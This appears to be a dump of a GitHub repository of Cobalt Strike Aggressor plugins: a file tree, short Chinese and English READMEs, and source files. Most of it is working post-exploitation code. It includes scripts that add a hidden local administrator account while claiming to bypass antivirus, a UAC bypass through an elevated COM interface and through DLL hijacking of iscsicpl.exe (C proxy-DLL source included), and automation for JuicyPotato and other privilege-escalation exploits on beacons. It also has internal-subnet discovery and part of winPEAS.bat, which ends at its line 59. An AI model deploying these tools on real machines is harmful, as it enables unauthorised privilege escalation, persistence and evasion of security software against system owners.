├── README.md ├── adduser ├── README.md ├── adduser.cna ├── image │ ├── 1.png │ ├── 2.png │ ├── Sucess.png │ ├── failed.png │ └── show_text.png └── modules │ ├── adduser.cs │ ├── adduser.exe │ └── adduser.ps1 ├── bypassUAC ├── README.md ├── bypassuac.cna ├── dll │ ├── x64 │ │ └── combypass.dll │ └── x86 │ │ ├── combypass.dll │ │ ├── isciexe.c │ │ ├── iscsiexe.dll │ │ └── iscsiexe_org.dll └── img │ ├── 1.png │ ├── 2.png │ ├── iscsiexe1.png │ ├── iscsiexe2.png │ ├── iscsiexe3.png │ └── iscsiexe4.png ├── info ├── JuicyPotato.exe ├── README.md ├── images │ ├── beaconfailed.png │ ├── image.png │ ├── img.png │ ├── information.png │ ├── iproute.png │ ├── iproute2.png │ ├── potato.png │ ├── potato2.png │ ├── potatodel.png │ ├── setpath.png │ └── winexp.png ├── modules │ └── route.ps1 ├── statistics.cna └── winPEAS.bat ├── lsassdump ├── README.md ├── dump.cna └── img │ ├── dcsync.png │ ├── editpasswd.png │ ├── map.png │ ├── minidump.png │ ├── ntdsutid.png │ ├── regdump.png │ ├── setntlm.png │ └── vssadmin.png ├── powerview_cs ├── PowerView_master.ps1 ├── PowerViewv3.0.ps1 ├── README.md ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── 7.jpg │ └── help.png └── powerview.cna ├── powerview常用 ├── 2008.png ├── 2008_query.cna ├── 2012_query.cna ├── AD.dll ├── Powerview.ps1 ├── README.md └── one.jpg ├── 上线提醒 ├── 1.png ├── 2.png ├── load.cna ├── plus.py └── readme.md ├── 代理 ├── NatSocks.x64.exe ├── NatSocks.x86.exe ├── README.md ├── default.cna ├── frpc.exe ├── frpc.ini ├── frps.exe ├── frps.ini └── img │ ├── frp.png │ ├── frp2.png │ ├── natsocks.png │ └── natsocks2.png ├── 取证 ├── README.md ├── img │ └── recentquery.png ├── openfilehistory.exe └── qz.cna ├── 杀毒检测 ├── README.md ├── av_query.png ├── check.cnf ├── check.ps1 ├── check.py ├── list.txt ├── process_check.cna ├── process_check.png └── xiaobaicheck.png ├── 权限维持 ├── ConsoleApp1.cs ├── README.md ├── addtask.exe ├── img │ ├── CacheTask │ │ ├── CacheTask.gif │ │ ├── CacheTask.png │ │ └── 
CacheTask2.png │ ├── SunloginClient │ │ └── SunloginClient.png │ ├── WmiPrvSE │ │ ├── 2008.png │ │ └── 7.png │ ├── javarun │ │ └── run.png │ ├── lnkhijack │ │ ├── 1.png │ │ └── 2.png │ ├── msdtc │ │ ├── msdtc.png │ │ └── msdtc2.png │ ├── rid │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 4.png │ │ └── 6.png │ ├── schtasks │ │ ├── 1.png │ │ ├── 2.png │ │ └── 3.png │ ├── service │ │ ├── Servicebeacon.png │ │ └── system_beacon.png │ ├── tokenrun │ │ ├── 1.png │ │ └── 2.png │ └── userAccountControl │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── 4.png ├── ridhijack.ps1 ├── ridquery.ps1 ├── service_c2.cna ├── svchost.exe ├── systemcmd_cs.cs └── systemcmd_cs.exe └── 痕迹清除 ├── README.md ├── clear.cna └── img ├── evtxclear.png ├── powershellclear.png └── rdpclear.png /README.md: -------------------------------------------------------------------------------- 1 | # csplugin 2 | 自己开的cs插件 3 | -------------------------------------------------------------------------------- /adduser/README.md: -------------------------------------------------------------------------------- 1 | ## bypass AV add user ## 2 | * bypass AV adduser(powershell) 3 | * bypass AV adduser(C#) 4 | ### bypass AV adduser(powershell) ### 5 | ![](image/show_text.png) 6 | 7 | ![](image/Sucess.png) 8 | 9 | ![](image/failed.png) 10 | 11 | ### bypass AV adduser(C#) ### 12 | ![](image/1.png) 13 | ![](image/2.png) 14 | -------------------------------------------------------------------------------- /adduser/adduser.cna: -------------------------------------------------------------------------------- 1 | sub Adduser{ 2 | bpowershell_import($bid, getFileProper(script_resource("modules"), "adduser.ps1")); 3 | bpowerpick($bid, "AddUser "."\"$3['username']\" "."\"$3['password']\""); 4 | } 5 | 6 | popup beacon_bottom{ 7 | menu "&API添加用户"{ 8 | item "bypass Av Add User(powershell)" { 9 | $bid = $1; 10 | $add = dialog("AddUser", %(username => "admin", password => "admin123456", bid => $bid), &Adduser); 11 | 
dialog_description($add, "绕过杀软进行添加用户\n条件:拥有Administrator权限"); 12 | 13 | drow_text($add, "username", "Username:"); 14 | drow_text($add, "password", "Password:"); 15 | dbutton_action($add, "Run"); 16 | dialog_show($add); 17 | } 18 | 19 | item "bypass Av Add User(.NET assembly Load)"{ 20 | $bid = $1; 21 | foreach $id ($bid){ 22 | bexecute_assembly($id, getFileProper(script_resource("modules"), "adduser.exe"), ""); 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /adduser/image/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/1.png -------------------------------------------------------------------------------- /adduser/image/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/2.png -------------------------------------------------------------------------------- /adduser/image/Sucess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/Sucess.png -------------------------------------------------------------------------------- /adduser/image/failed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/failed.png -------------------------------------------------------------------------------- /adduser/image/show_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/show_text.png 
-------------------------------------------------------------------------------- /adduser/modules/adduser.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | using System.Threading.Tasks; 7 | 8 | 9 | namespace adduser 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | try 16 | { 17 | var net = new DirectoryEntry("WinNT://" + Environment.MachineName); 18 | var users = net.Children.Add("test", "User"); 19 | users.Invoke("SetPassword", "Hxc123456!"); 20 | users.Invoke("Put", "UserFlags", 66049); 21 | users.CommitChanges(); 22 | Console.WriteLine("[+] 添加用户成功"); 23 | var group = net.Children.Find("Administrators", "group"); 24 | if (group.Name != "") 25 | { 26 | try 27 | { 28 | group.Invoke("Add", users.Path.ToString()); 29 | Console.WriteLine("[+] 添加用户组成功"); 30 | Console.WriteLine("Username:test Password:Hxc123456!"); 31 | } 32 | catch 33 | { 34 | Console.WriteLine("[-] 添加用户组失败"); 35 | } 36 | } 37 | else 38 | { 39 | Console.WriteLine("[-] 无此用户组"); 40 | } 41 | } 42 | catch 43 | { 44 | Console.WriteLine("[-] 添加用户失败"); 45 | } 46 | } 47 | } 48 | } -------------------------------------------------------------------------------- /adduser/modules/adduser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/modules/adduser.exe -------------------------------------------------------------------------------- /adduser/modules/adduser.ps1: -------------------------------------------------------------------------------- 1 | function AddUser($username,$password){ 2 | if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){ 3 | 
$computer=Get-WMIObject Win32_ComputerSystem 4 | $computername = $computer.name 5 | $username = $username 6 | $password = $password 7 | $desc = 'Local admin account' 8 | $computer = [ADSI]"WinNT://$computername,computer" 9 | $user = $computer.Create("user", $username) 10 | $user.SetPassword($password) 11 | $user.Setinfo() 12 | $user.description = $desc 13 | $user.setinfo() 14 | $user.UserFlags = 65536 15 | $user.SetInfo() 16 | $group = [ADSI]("WinNT://$computername/administrators,group") 17 | $group.add("WinNT://$username,user") 18 | $dc=Get-WmiObject -Class Win32_UserAccount | find ": $username" 19 | if($dc.Length -eq 0){ 20 | Write-Host "[-] Add user:$username failed" 21 | }else{ 22 | Write-Host "[+] Add user:$username Sucess" 23 | net user $username 24 | } 25 | }else{ 26 | Write-Host "[-] Not Administrator power" 27 | } 28 | } -------------------------------------------------------------------------------- /bypassUAC/README.md: -------------------------------------------------------------------------------- 1 | ## bypassUC ## 2 | * ICMLuaUtil::ShellExec Bypassuac 3 | * iscsiexeBypassUac 4 | 5 | ### ICMLuaUtil::ShellExec Bypassuac ### 6 | 参考链接:https://y4er.com/post/bypassuac-with-icmluautil/ 7 | ![](img/1.png) 8 | ![](img/2.png) 9 | 10 | 如果执行没反应,检查终端是否出现:Opened: Scripts with no remove listener,如果有,重新连接cs即可解决 11 | 12 | ### iscsiexeBypassUac ## 13 | ![](img/iscsiexe1.png) 14 | ![](img/iscsiexe2.png) 15 | ![](img/iscsiexe3.png) 16 | ![](img/iscsiexe4.png) 17 | -------------------------------------------------------------------------------- /bypassUAC/bypassuac.cna: -------------------------------------------------------------------------------- 1 | sub combypassuac_{ 2 | if (-is64 $3['bid']){ 3 | blog($3['bid'], "The Beacon Arch:x64"); 4 | $dllpath = script_resource("dll/x64/combypass.dll"); 5 | }else{ 6 | blog($3['bid'], "The Beacon Arch:x86"); 7 | $dllpath = script_resource("dll/x86/combypass.dll"); 8 | } 9 | 10 | btask($3['bid'], "Type: Elevated COM interface"); 
11 | btask($3['bid'], "Method: ICMLuaUtil"); 12 | bupload($3['bid'], $dllpath); 13 | bshell($3['bid'], "rundll32 combypass.dll,MyBypassUAC $3['executepath']"); 14 | brm($3['bid'], "combypass.dll"); 15 | } 16 | 17 | sub combypassuac{ 18 | foreach $id ($bid){ 19 | $dialog = dialog("COM DLL Bypassuc", %(executepath => "C:\\Windows\\System32\\cmd.exe", bid => $id), &combypassuac_); 20 | dialog_description($dialog, "combypassuac #指定一个要运行的PE文件"); 21 | drow_text($dialog, "executepath", "executepath:"); 22 | dbutton_action($dialog, "run"); 23 | dialog_show($dialog); 24 | } 25 | } 26 | 27 | sub iscsicplexebypassuac_{ 28 | foreach $id ($bid){ 29 | bshell($id, "reg add HKEY_CURRENT_USER\\Environment /v Path /d $3['Path'] /F"); 30 | bcd($id, $3['Path']); 31 | bupload($id, script_resource("dll/x86/iscsiexe.dll")); 32 | bupload($id, script_resource("dll/x86/iscsiexe_org.dll")); 33 | } 34 | } 35 | 36 | sub iscsicplexebypassuac{ 37 | $dialog = dialog("iscsicpl.exe ByPassUac", %(Path => "C:\\Users\\Public", bid => $bid), &iscsicplexebypassuac_); 38 | dialog_description($dialog, "c:\\Windows\\syswow64\\iscsicpl.exe缺少iscsiexe.dll和iscsiexe_org.dll"); 39 | drow_text($dialog, "Path", "Path:"); 40 | dbutton_action($dialog, "run"); 41 | dialog_show($dialog); 42 | } 43 | 44 | sub iscsicplexebypassuacrun{ 45 | foreach $id ($bid){ 46 | bshell($id, "c:\\windows\\syswow64\\iscsicpl.exe c=$3['Command']"); 47 | } 48 | } 49 | 50 | sub iscsicplexebypassuacdel_{ 51 | foreach $id ($bid){ 52 | bcd($id, $3['Path']); 53 | brm($id, "$3['Path']\\iscsiexe.dll"); 54 | brm($id, "$3['Path']\\iscsiexe_org.dll"); 55 | } 56 | 57 | } 58 | 59 | sub iscsicplexebypassuac2{ 60 | $dialog = dialog("iscsicpl.exe ByPassUac", %(Command => "C:\\Windows\\System32\\cmd.exe", bid => $bid), &iscsicplexebypassuacrun); 61 | dialog_description($dialog, "c:\\windows\\syswow64\\iscsicpl.exe c="); 62 | drow_text($dialog, "Command", "Command:"); 63 | dbutton_action($dialog, "run"); 64 | dialog_show($dialog); 65 | } 66 | 67 | sub 
iscsicplexebypassuacdel{ 68 | $dialog = dialog("iscsicpl.exe ByPassUac", %(Path => "C:\\Users\\Public", bid => $bid), &iscsicplexebypassuacdel_); 69 | dialog_description($dialog, "删除上传的DLL"); 70 | drow_text($dialog, "Path", "Path:"); 71 | dbutton_action($dialog, "run"); 72 | dialog_show($dialog); 73 | } 74 | 75 | 76 | popup beacon_bottom{ 77 | menu "&bypassuac"{ 78 | item "&Elevated COM Bypassuc"{ 79 | $bid = $1; 80 | combypassuac($bid); 81 | } 82 | 83 | menu "&iscsicpl.exe ByPassUac"{ 84 | item "&上传dll和修改注册表"{ 85 | $bid = $1; 86 | iscsicplexebypassuac($bid); 87 | } 88 | 89 | item "&冲冲冲"{ 90 | $bid = $1; 91 | iscsicplexebypassuac2($bid); 92 | } 93 | 94 | item "&删除dll"{ 95 | $bid = $1; 96 | iscsicplexebypassuacdel($bid); 97 | } 98 | } 99 | } 100 | 101 | } 102 | 103 | 104 | -------------------------------------------------------------------------------- /bypassUAC/dll/x64/combypass.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x64/combypass.dll -------------------------------------------------------------------------------- /bypassUAC/dll/x86/combypass.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x86/combypass.dll -------------------------------------------------------------------------------- /bypassUAC/dll/x86/isciexe.c: -------------------------------------------------------------------------------- 1 | // iscsiexe.cpp, the payload DLL executed by iscsicpl.exe 2 | #include "pch.h" 3 | #include 4 | #include 5 | #include 6 | #include "resource.h" 7 | #pragma pack(1) 8 | 9 | // LoadString() for linker 10 | #pragma comment(lib,"User32.lib") 11 | 12 | #define MAX_ENV_SIZE 32767 13 | 14 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 15 | { 16 
| char *commandline=NULL; 17 | char *p = NULL; 18 | char split[2] = { '=' }; 19 | char *execute=NULL; 20 | switch (ul_reason_for_call) 21 | { 22 | case DLL_PROCESS_ATTACH: 23 | commandline=GetCommandLineA(); 24 | p = strtok(commandline, split); 25 | while (p != NULL) { 26 | execute = p; 27 | p = strtok(NULL, split); 28 | } 29 | WinExec(execute,SW_SHOW); 30 | ExitProcess(0); 31 | break; 32 | case DLL_THREAD_ATTACH: 33 | case DLL_THREAD_DETACH: 34 | case DLL_PROCESS_DETACH: 35 | break; 36 | } 37 | return TRUE; 38 | } 39 | 40 | // the proxy DLL mappings for the linker 41 | #pragma comment(linker, "/export:SvchostPushServiceGlobals=iscsiexe_org.SvchostPushServiceGlobals") 42 | #pragma comment(linker, "/export:ServiceMain=iscsiexe_org.ServiceMain") 43 | #pragma comment(linker, "/export:DiscpEstablishServiceLinkage=iscsiexe_org.DiscpEstablishServiceLinkage") -------------------------------------------------------------------------------- /bypassUAC/dll/x86/iscsiexe.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x86/iscsiexe.dll -------------------------------------------------------------------------------- /bypassUAC/dll/x86/iscsiexe_org.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x86/iscsiexe_org.dll -------------------------------------------------------------------------------- /bypassUAC/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/1.png -------------------------------------------------------------------------------- /bypassUAC/img/2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/2.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe1.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe2.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe3.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe4.png -------------------------------------------------------------------------------- /info/JuicyPotato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/JuicyPotato.exe -------------------------------------------------------------------------------- /info/README.md: -------------------------------------------------------------------------------- 1 | ### statistics ### 2 | 功能: 3 | * 统计在线主机和掉线主机 4 | * windows信息收集 5 | * JuicyPotato提权 6 | * 提权工具快速利用 7 | * ip route(获取内网IP段) 8 | 9 | ### 统计在线主机和掉线主机 ### 10 
| ctrl+l 11 | ![](images/image.png) 12 | 13 | ![](images/beaconfailed.png) 14 | 15 | ### windows信息收集 ### 16 | ![](images/information.png) 17 | 18 | ### JuicyPotato提权 ### 19 | ![](images/potato.png) 20 | 21 | ![](images/potato2.png) 22 | 23 | ![](images/potatodel.png) 24 | 25 | ### 提权工具快速利用 ### 26 | ![](images/img.png) 27 | 28 | ![](images/setpath.png) 29 | 30 | ![](images/winexp.png) 31 | 32 | ### ip route(获取内网IP段) ### 33 | ![](images/iproute.png) 34 | 35 | ![](images/iproute2.png) 36 | -------------------------------------------------------------------------------- /info/images/beaconfailed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/beaconfailed.png -------------------------------------------------------------------------------- /info/images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/image.png -------------------------------------------------------------------------------- /info/images/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/img.png -------------------------------------------------------------------------------- /info/images/information.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/information.png -------------------------------------------------------------------------------- /info/images/iproute.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/iproute.png -------------------------------------------------------------------------------- /info/images/iproute2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/iproute2.png -------------------------------------------------------------------------------- /info/images/potato.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/potato.png -------------------------------------------------------------------------------- /info/images/potato2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/potato2.png -------------------------------------------------------------------------------- /info/images/potatodel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/potatodel.png -------------------------------------------------------------------------------- /info/images/setpath.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/setpath.png -------------------------------------------------------------------------------- /info/images/winexp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/winexp.png 
-------------------------------------------------------------------------------- /info/modules/route.ps1: -------------------------------------------------------------------------------- 1 | write-host "Intranet IP segment acquisition" 2 | $regex = [regex]"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" 3 | $global:ipsub=@() 4 | $global:temp=@() 5 | $global:iproute=@() 6 | $regex.Matches((route print)) | ForEach-Object{ 7 | $iplist=$_.Value.Split(".") 8 | if([int]$iplist[0] -eq 10 -and [int]$iplist[1] -le 255 -and [int]$iplist[2] -le 255 -and [int]$iplist[3] -le 255){ 9 | $ipsub += $_.Value 10 | }elseif([int]$iplist[0] -eq 192 -and [int]$iplist[1] -eq 168 -and [int]$iplist[2] -le 255 -and [int]$iplist[3] -le 255){ 11 | $ipsub += $_.Value 12 | }elseif(([int]$iplist[0] -eq 172) -and (([int]$iplist[1] -eq 16) -and ([int]$iplist[1] -le 31)) -and ([int]$iplist[2] -le 255) -and ([int]$iplist[3] -le 255)){ 13 | $ipsub += $_.Value 14 | } 15 | } 16 | $ipsub=$ipsub | sort -Unique 17 | foreach($ip in $ipsub){ 18 | $ipx=$ip.Split(".") 19 | $tmp= $ipx[0] + "." + $ipx[1] + "." + $ipx[2] 20 | if($temp -notcontains $tmp){ 21 | $temp += $tmp 22 | $iproute += $ip 23 | } 24 | } 25 | $iproute -------------------------------------------------------------------------------- /info/statistics.cna: -------------------------------------------------------------------------------- 1 | bind Ctrl+L{ 2 | $beacons = beacons(); 3 | $survive = @(); 4 | $death = @(); 5 | if (strlen($beacons) > 0){ 6 | foreach $entry ($beacons){ 7 | $alive = $entry["alive"]; 8 | $data = "ip: ".$entry["external"]." computer:".$entry["computer"]." user:".$entry["user"]." 
last:".$entry["last"]."s"; 9 | if($alive eq 'true'){ 10 | add($survive, $data, -1); 11 | }else{ 12 | add($death, $data, -1); 13 | } 14 | } 15 | show_message("存活主机数量:".size($survive)."\n掉线机器数量:".size($death)."\n".join("\n", $death)); 16 | } 17 | } 18 | 19 | 20 | alias winpeas{ 21 | if ($2 eq "del"){ 22 | brm($1, "winpeas.bat"); 23 | }else{ 24 | bupload($1, script_resource("winPEAS.bat")); 25 | bshell($1, "winpeas.bat"); 26 | } 27 | } 28 | 29 | alias JuicyPotato{ 30 | $args = $2; 31 | $cmd = $3; 32 | if ((strlen($args) > 0) && (strlen($cmd) > 0)){ 33 | if($2 !eq "del"){ 34 | blog($1, $args); 35 | $command ="$args "."$cmd"; 36 | bshell($1, "JuicyPotato.exe ".$command); 37 | } 38 | }else if($args eq "del"){ 39 | brm($1, "JuicyPotato.exe"); 40 | }else{ 41 | bupload($1, script_resource("JuicyPotato.exe")); 42 | bshell($1, "JuicyPotato.exe"); 43 | } 44 | } 45 | 46 | 47 | $evpath = ""; 48 | popup beacon_bottom{ 49 | item "常用提权"{ 50 | prompt_text("提权exp路径设置", "D:\\tools\\ctf\\exploit\\windows exploit\\elevated privileges\\15015\\MS15-015\\Release\\", lambda({ 51 | $evpath = "$1"; 52 | blog($ids, $evpath); 53 | }, $ids => $1)); 54 | } 55 | } 56 | 57 | alias winexp{ 58 | @files = ls($evpath); 59 | if (strlen($2) > 0){ 60 | if (((strlen($2) > 0) && (strlen($3) > 0) && (strlen($4) > 0)) || (strlen($2) > 0) && (strlen($3) > 0) || (strlen($5) > 0) || (strlen($6) > 0)){ 61 | if (($2 eq "replace") && (strlen($3) > 0)){ 62 | $command = replace($3, "@", " "); 63 | bshell($1, $command); 64 | }else if ((strlen($6) > 0)){ 65 | $command = $2." $3 $4 $5 $6"; 66 | bshell($1, $command); 67 | }else if ((strlen($5) > 0)){ 68 | $command = $2." $3 $4 $5"; 69 | bshell($1, $command); 70 | }else if ((strlen($4) > 0)){ 71 | $command = $2." $3 $4"; 72 | bshell($1, $command); 73 | }else if($3 eq "0"){ 74 | bshell($1, $2); 75 | }else{ 76 | $command = $2." $3"; 77 | bshell($1, $command); 78 | } 79 | }else{ 80 | $test = $evpath.$2; 81 | if($test in @files){ 82 | blog($1, strlen($test)." 
path:".$test); 83 | bupload($1, $test); 84 | bshell($1, $2); 85 | }else{ 86 | berror($1, "file: $test not found"); 87 | } 88 | } 89 | }else{ 90 | blog2($1, "beacon上的常用提权设置路径,路径结尾记得加/或\->C:\ or /root/home/") 91 | blog2($1, "winexp MS15-015.exe #上传MS15-015.exe"); 92 | blog2($1, "winexp potato.exe 0 #无参数执行exp"); 93 | blog2($1, "winexp MS15-015.exe \"whoami\" #执行exp"); 94 | blog2($1, "最多支持6个参数的exp,如果需要多个参数执行:winexp replace exp.exe@-d@1@-c@{11111111-11111111-11111111}@-p@whoami") 95 | } 96 | } 97 | 98 | alias route{ 99 | $handle = openf(script_resource("modules\\route.ps1")); 100 | $text = readb($handle, -1); 101 | closef($handle); 102 | bpowerpick($1, $text); 103 | } 104 | -------------------------------------------------------------------------------- /info/winPEAS.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | set long=no 4 | 5 | 6 | echo *((,.,/((((((((((((((((((((/, */ 7 | echo ,/*,..*(((((((((((((((((((((((((((((((((, 8 | echo ,*/((((((((((((((((((/, .*//((//**, .*((((((* 9 | echo ((((((((((((((((* *****,,,/########## .(* ,(((((( 10 | echo (((((((((((/* ******************/####### .(. (((((( 11 | echo ((((((..******************/@@@@@/***/######* /(((((( 12 | echo ,,..**********************@@@@@@@@@@(***,#### ../((((( 13 | echo , ,**********************#@@@@@#@@@@*********##((/ /(((( 14 | echo ..(((##########*********/#@@@@@@@@@/*************,,..(((( 15 | echo .(((################(/******/@@@@@#****************.. 
/(( 16 | echo .((########################(/************************..*( 17 | echo .((#############################(/********************.,( 18 | echo .((##################################(/***************..( 19 | echo .((######################################(************..( 20 | echo .((######(,.***.,(###################(..***(/*********..( 21 | echo .((######*(#####((##################((######/(********..( 22 | echo .((##################(/**********(################(**...( 23 | echo .(((####################/*******(###################.(((( 24 | echo .(((((############################################/ /(( 25 | echo ..(((((#########################################(..(((((. 26 | echo ....(((((#####################################( .((((((. 27 | echo ......(((((#################################( .(((((((. 28 | echo (((((((((. ,(############################(../(((((((((. 29 | echo (((((((((/, ,####################(/..((((((((((. 30 | echo (((((((((/,. ,*//////*,. ./(((((((((((. 31 | echo (((((((((((((((((((((((((((/" 32 | echo by carlospolop 33 | echo 34 | echo Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. 35 | echo 36 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] BASIC SYSTEM INFO ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 37 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WINDOWS OS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 38 | echo [i] Check for vulnerabilities for the OS version with the applied patches 39 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits 40 | systeminfo 41 | echo. 42 | wmic qfe get Caption,Description,HotFixID,InstalledOn | more 43 | echo. 44 | echo. 
45 | set expl=no 46 | for /f "tokens=3-9" %%a in ('systeminfo') do (echo "%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (echo "%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) 47 | IF "%expl%" == "yes" echo [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) 48 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL 49 | IF "%expl%" == "yes" IF errorlevel 1 echo MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) 50 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL 51 | IF "%expl%" == "yes" IF errorlevel 1 echo MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) 52 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL 53 | IF "%expl%" == "yes" IF errorlevel 1 echo MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) 54 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL 55 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) 56 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL 57 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) 58 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL 59 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-092 patch is NOT installed! 
